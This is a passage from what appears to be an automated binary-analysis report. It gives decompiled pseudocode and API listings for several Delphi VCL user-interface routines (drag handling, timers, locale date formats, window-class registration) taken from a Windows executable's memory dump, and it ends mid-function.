				E00404D24( &_v100, _t281);
				_t262 =  &_v8;
				_push(_t327);
				_push(0x456763);
				_push( *[fs:eax]);
				 *[fs:eax] = _t327 + 0xffffff70;
				 *((char*)( *_t262 + 0x58)) = 0;
				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044C7F4() == 0 || E00453DB8(E00434420( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
					L23:
					_t135 = _v52;
					__eflags = _t135;
					if(_t135 <= 0) {
						E004561CC( *_t262);
					} else {
						E00455FD4( *_t262, 0, _t135);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E00456204();
					_v84 = E0045317C();
					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
					E00435514( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
					_t333 = _t319;
					if(_t319 == 0) {
						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
						_t290 =  *0x431d04; // 0x431d50
						_t171 = E00403768(_t320, _t290);
						__eflags = _t171;
						if(_t171 != 0) {
							__eflags =  *(_t320 + 0x190);
							if( *(_t320 + 0x190) != 0) {
								ClientToScreen( *(_t320 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t319 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E004356B8( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00453D80( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
					E00432CA8(_v148,  &_v140,  &_v144, _t333);
					E004043E0( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
					_t193 =  *0x476b44; // 0x432278
					_v96 = _t193;
					_v40 = 0;
					_v33 = E00436D28( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
						_t199 = 0;
					} else {
						_t199 = 1;
					}
					_t296 =  *_t262;
					 *((char*)( *_t262 + 0x58)) = _t199;
					if( *((char*)( *_t262 + 0x58)) == 0) {
						goto L23;
					} else {
						_t340 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E00456358(_v96, _t296, _t326);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E004037D8( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
							_v116.left = _v116.left - E00420540( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
							_v116.right = _v116.right - E00420540( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
						}
						E0043568C( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
						_t223 =  *_t262;
						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
						E0043568C( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
						_t227 =  *_t262;
						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
						E00435D14( *((intOrPtr*)( *_t262 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
						E00453ECC(_v44);
						_t236 = _v52;
						if(_v52 <= 0) {
							E00455FD4( *_t262, 1, _v48);
						} else {
							E00455FD4( *_t262, 0, _t236);
						}
						L26:
						_pop(_t282);
						 *[fs:eax] = _t282;
						_push(0x45676a);
						E0040436C( &_v148, 2);
						_t284 =  *0x44c43c; // 0x44c440
						return E00404DF4( &_v100, _t284);
					}
				}
			}

APIs

Part of subcall function 0044C7F4: GetActiveWindow.USER32 ref: 0044C7F7
Part of subcall function 0044C7F4: GetCurrentThreadId.KERNEL32 ref: 0044C80C
Part of subcall function 0044C7F4: EnumThreadWindows.USER32(00000000,0044C7D4), ref: 0044C812

Part of subcall function 00456204: GetCursor.USER32(?), ref: 0045621F
Part of subcall function 00456204: GetIconInfo.USER32(00000000,?), ref: 00456225

ClientToScreen.USER32(?,?), ref: 004564E4
OffsetRect.USER32(?,?,?), ref: 004564FB
OffsetRect.USER32(?,?,?), ref: 0045662B

Part of subcall function 00455FD4: SetTimer.USER32(00000000,00000000,?,00453DD8), ref: 00455FEE

Strings

x"C, xrefs: 00456561

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
String ID: x"C
API String ID: 2591747986-3989092080
Opcode ID: 585126cc80ca6015a07ca28d9b345bf2d8f416a0fe101d06df0c7b29d0d34172
Instruction ID: fd2f906bf4e1ba9d7d0e8727a3be0329d4ef2a06f7fb95116565e09485ce8d40
Opcode Fuzzy Hash: 585126cc80ca6015a07ca28d9b345bf2d8f416a0fe101d06df0c7b29d0d34172
Instruction Fuzzy Hash: C8D1F575A006188FCB10DFA8C884B9EB7F5BF09304F5581AAE904EB366DB34AD49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0045EDFC, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 276
timeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0045EDFC(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				char _v21;
				char _v124;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t145;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr _t193;
				signed int _t197;
				signed int _t204;
				intOrPtr _t213;
				intOrPtr _t215;
				signed int _t224;
				signed int _t237;
				signed int _t240;
				void* _t248;
				void* _t252;
				signed int _t253;
				intOrPtr _t268;
				intOrPtr _t284;
				void* _t295;
				signed int _t297;
				intOrPtr _t304;

				_v9 = __ecx;
				_t253 = __edx;
				_v8 = __eax;
				_t294 = _a8;
				_v21 = 0;
				E0045FCB0(_v8, __edx, _a8, _t295);
				_t145 = _v8;
				_t305 =  *(_t145 + 0x1c) & 0x00000010;
				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
					L5:
					__eflags = _t253;
					if(_t253 != 0) {
						L8:
						__eflags = _t253;
						if(_t253 != 0) {
							L37:
							_push(0x45f1a7);
							_push( *[fs:eax]);
							 *[fs:eax] = _t304;
							E00437140(_v8, _t253, _a4, _t294);
							_pop(_t268);
							 *[fs:eax] = _t268;
							return 0;
						}
						E0045C724(_v8,  &_v124);
						_t296 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
						__eflags =  *((char*)(_v8 + 0x28e));
						if(__eflags != 0) {
							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
							if(__eflags == 0) {
								_t296 = 0xffc8;
								_t237 = E004037D8(_v8, __eflags);
								__eflags = _t237;
								if(_t237 != 0) {
									_t240 = E00435578(_v8) -  *(_v8 + 0x264);
									__eflags = _t240;
									 *(_v8 + 0x264) = _t240;
								}
							}
							return E0045D118(_v8, _t253,  &_v124, _t294, _t296);
						}
						_t259 = _a4;
						E0045C6C8(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
						_t169 = _v8;
						_t297 = _v20;
						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
							L25:
							_t171 = _v8;
							__eflags =  *(_t171 + 0x249) & 0x00000001;
							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
								L31:
								_t172 = _v8;
								__eflags =  *(_t172 + 0x249) & 0x00000002;
								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
									__eflags = _v16;
									if(_v16 >= 0) {
										_t173 = _v8;
										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
											if(__eflags <= 0) {
												_t177 = _v20;
												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
												E00412B58(_t294,  &_v132, _a4, _t294, _t297);
												_push( &_v132);
												_t184 = E004037D8(_v8, __eflags);
												__eflags = _t184;
												if(_t184 != 0) {
													 *((char*)(_v8 + 0x28e)) = 5;
													 *((intOrPtr*)( *_v8 + 0x88))();
													E0045D258(_v8, _t253, _t294, 0xffa3);
													_v21 = 1;
													SetTimer(E0043C1F4(_v8), 1, 0x3c, 0);
												}
											}
										}
									}
								}
								goto L37;
							}
							__eflags = _v20;
							if(_v20 < 0) {
								goto L31;
							}
							_t193 = _v8;
							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
							if(__eflags > 0) {
								goto L31;
							}
							_t197 = _v16;
							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
							E00412B58(_t294,  &_v132, _a4, _t294, _t297);
							_push( &_v132);
							_t204 = E004037D8(_v8, __eflags);
							__eflags = _t204;
							if(_t204 != 0) {
								 *((char*)(_v8 + 0x28e)) = 4;
								 *((intOrPtr*)( *_v8 + 0x88))();
								E0045D258(_v8, _t253, _t294, 0xffa2);
								_v21 = 1;
								SetTimer(E0043C1F4(_v8), 1, 0x3c, 0);
							}
							goto L37;
						}
						_t213 = _v8;
						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
							goto L25;
						}
						_t215 = _v8;
						__eflags =  *(_t215 + 0x249) & 0x00000004;
						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
							 *((char*)(_v8 + 0x28e)) = 1;
							SetTimer(E0043C1F4(_v8), 1, 0x3c, 0);
							__eflags = _v9 & 0x00000001;
							if((_v9 & 0x00000001) == 0) {
								E0045DD90(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
							} else {
								E0045DD08(_v8, _t259,  &_v20, _t294);
							}
							goto L37;
						}
						_t284 = _v8;
						_t224 = _v20;
						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
							L20:
							E0045DD90(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
							E0045FD8C(_v8, _t294, _t297);
							L21:
							E004037D8(_v8, __eflags);
							goto L37;
						}
						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
						if(__eflags != 0) {
							goto L20;
						}
						E0045B670(_v8);
						goto L21;
					}
					__eflags = _v9 & 0x00000040;
					if(__eflags == 0) {
						goto L8;
					} else {
						E004037D8(_v8, __eflags);
						goto L37;
					}
				}
				if(E004037D8(_v8, _t305) != 0) {
					L3:
					 *((intOrPtr*)( *_v8 + 0xc0))();
					_t248 = E0045B5E0(_v8, _t307);
					_t308 = _t248;
					if(_t248 == 0) {
						return E00435DAC(_v8, 0, _t308);
					}
					goto L5;
				}
				_t252 = E0044CA0C(_v8);
				_t307 = _t252;
				if(_t252 != 0) {
					goto L5;
				}
				goto L3;
			}

APIs

SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045EFD1
SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F0BC
SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F178

Strings

@, xrefs: 0045EE6B

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer
String ID: @
API String ID: 2870079774-2766056989
Opcode ID: 277efad1124f353acaae576ad763c253c0251cad4085aaa46d3643ed720e3f54
Instruction ID: ab6b22797005bf25710cea3a170a4cdf27d12ab71d425799125bb5ef16b91ff9
Opcode Fuzzy Hash: 277efad1124f353acaae576ad763c253c0251cad4085aaa46d3643ed720e3f54
Instruction Fuzzy Hash: 0AC13934A04208EFCB10DB99C985BDEB7F5AF04345F2441A6EC04AB392CB79AF49DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00409CE8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409CE8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x409eb2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404348(__edx);
				E004099B0(GetThreadLocale(), 0x409ec8, 0x1009,  &_v12);
				if(E0040879C(0x409ec8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404600(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x4760c0], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408D14(_t124 + _t92 - 1, 2, 0x409ecc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408D14(_t124 + _t92 - 1, 4, 0x409edc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408D14(_t124 + _t92 - 1, 2, 0x409ef4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404608(_t122, 0x409f0c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404528();
												E00404608(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404608(_t122, 0x409f00);
										_t92 = _t92 + 1;
									}
								} else {
									E00404608(_t122, 0x409eec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404608(_t122, 0x409ed8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040AA30(_t124, _t92);
							E00404858(_t124, _v8, _t92,  &_v20);
							E00404608(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x4927f4; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E0040439C(_t122, _t124);
					} else {
						while(_t92 <= E00404600(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404528();
									E00404608(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00409EB9);
				return E0040436C( &_v24, 4);
			}

APIs

GetThreadLocale.KERNEL32(?,00000000,00409EB2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409D17

Part of subcall function 004099B0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099CE

Strings

ggg, xrefs: 00409DFC
yyyy, xrefs: 00409E09
eeee, xrefs: 00409E22

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 17bddf546044935fcbc3064db17a53d4116d1eedd6881555b156d6c6746cd119
Instruction ID: c2f76db8bbbdb6168a2e3f88b395cd33782f4f460061de2cfd9d1bf4bcd30a7e
Opcode Fuzzy Hash: 17bddf546044935fcbc3064db17a53d4116d1eedd6881555b156d6c6746cd119
Instruction Fuzzy Hash: A441E3B13041014BC711FAA9C8816BFB296DFC5308B64453BE995B37C7EA3D9C0286AE

Uniqueness

Uniqueness Score: -1.00%

Function 00442F68, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00442F68(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v36;
				intOrPtr _t69;
				void* _t90;
				intOrPtr _t108;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				intOrPtr _t122;

				_t120 = _t121;
				_t122 = _t121 + 0xffffffe0;
				_v12 = __edx;
				_v8 = __eax;
				E00412B80( *((intOrPtr*)(_v8 + 0x34)), 0,  &_v36,  *((intOrPtr*)(_v8 + 0x30)));
				E004439E4(_v8);
				 *[fs:eax] = _t122;
				_v16 = E004242A0(1);
				 *[fs:eax] = _t122;
				 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x4430d3, _t120,  *[fs:eax], 0x4430f0, _t120, __edi, __esi, __ebx, _t119);
				 *((intOrPtr*)( *_v16 + 0x40))();
				_v20 = E004242A0(1);
				 *[fs:eax] = _t122;
				E004256B8(_v20, 1);
				 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x4430b6, _t120);
				 *((intOrPtr*)( *_v20 + 0x40))();
				_t69 = _v12;
				_push(_t69);
				L00426A24();
				_t117 = _t69 - 1;
				if(_t117 >= 0) {
					_t118 = _t117 + 1;
					_t90 = 0;
					do {
						E00420284(E00424868(_v16),  &_v36);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420704(_t74));
						_push(_t90);
						_push(_v12);
						L00426A5C();
						E00420284(E00424868(_v20),  &_v36);
						_push(0x10);
						_push(0);
						_push(0);
						_push(E00420704(_t81));
						_push(_t90);
						_push(_v12);
						L00426A5C();
						E00442B3C(_v8, _t90, _v20, _v16, _t118, 0);
						_t90 = _t90 + 1;
						_t118 = _t118 - 1;
					} while (_t118 != 0);
				}
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x4430bd);
				return E004035DC(_v20);
			}

APIs

73451FD0.COMCTL32(?,?,?,00000000,004430F0), ref: 00443027

Part of subcall function 00420284: FillRect.USER32 ref: 004202AC

73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,004430F0), ref: 0044305D
73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00443089

Part of subcall function 00442B3C: 734520C0.COMCTL32(?,00000000,00000000,00000000,00442BCE,?,00000000,00442BEB), ref: 00442BB0

Strings

A, xrefs: 00442FA9, 00442FE2

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 73452500$73451734520FillRect
String ID: A
API String ID: 3869139703-2078354741
Opcode ID: b4ffc3f47e7deb19502ac242df4b656891a4a915ffacd21f13dcba7425699d3d
Instruction ID: 77afc3dafbf1cdd448c97966df04d146874992a2a85c17ee3dadf89815f4e08c
Opcode Fuzzy Hash: b4ffc3f47e7deb19502ac242df4b656891a4a915ffacd21f13dcba7425699d3d
Instruction Fuzzy Hash: 78411B74B00218EFD711EFA6D881EAEB7F9FB49704F9145A6F800AB351CA39AD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00439304, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00439304(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t47;
				void* _t48;
				intOrPtr _t75;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				intOrPtr* _t100;
				void* _t104;

				_t98 = __edi;
				_t83 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t100 = __eax;
				_push(_t104);
				_push(0x43948f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104 + 0xffffff40;
				_t84 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t48 = _t47 + 1;
					if(_t48 == 0 || E004329A0 != _v184.lpfnWndProc) {
						if(_t48 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E004329A0;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040B30C(_t83, _t84, _t98, _t100);
						}
					}
					 *0x476900 = _t100;
					_t85 =  *_t100;
					 *((intOrPtr*)( *_t100 + 0x9c))();
					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
						E0040B30C(_t83, _t85, _t98, _t100);
					}
					E00408E2C( *((intOrPtr*)(_t100 + 0x64)));
					 *((intOrPtr*)(_t100 + 0x64)) = 0;
					E0043C504(_t100);
					E00436D28(_t100, E0041F414( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
					_t117 =  *((char*)(_t100 + 0x5c));
					if( *((char*)(_t100 + 0x5c)) != 0) {
						E004037D8(_t100, _t117);
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x439496);
					return E00404348( &_v196);
				} else {
					_t83 =  *((intOrPtr*)(__eax + 4));
					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t100 + 8));
						_v188 = 0xb;
						_t75 =  *0x49115c; // 0x41d518
						E00406548(_t75,  &_v196);
						_t84 = _v196;
						E0040A194(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
						E00403DA8();
					} else {
						_t97 =  *0x431d04; // 0x431d50
						if(E00403768(_t83, _t97) == 0) {
							goto L6;
						}
						_v116 = E0043C1F4(_t83);
					}
					goto L7;
				}
			}

APIs

GetClassInfoA.USER32 ref: 004393C8
UnregisterClassA.USER32 ref: 004393F0
RegisterClassA.USER32 ref: 00439406

Strings

@, xrefs: 0043933D

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 4978b6c09712402e4c4fc02ea75a6312b411d7da4883799cb57afb89c19d0253
Instruction ID: c8ad39c23a5991b2574368495f38e56e8604bba2fa955fb7ae72dfc94ddaed53
Opcode Fuzzy Hash: 4978b6c09712402e4c4fc02ea75a6312b411d7da4883799cb57afb89c19d0253
Instruction Fuzzy Hash: AD418C70A043589BDB20EF69CC81B9E77F9AF48304F0051BAE849E7391DB78AD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00433D54, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00433D54(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x492b8c = __eax;
				_t24 =  *0x492b8c; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x492b98);
				_t26 =  *0x492b8c; // 0x0
				_t58 = 0x492b98->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x492b9c; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x492ba0 = GetCursor();
				_t28 =  *0x492b8c; // 0x0
				 *0x492b94 = E00432F94(_t28);
				 *0x492ba4 = _t70;
				_t60 =  *0x430ae0; // 0x430b2c
				if(E00403768(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x492ba8 = 0;
					} else {
						 *0x492ba8 = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
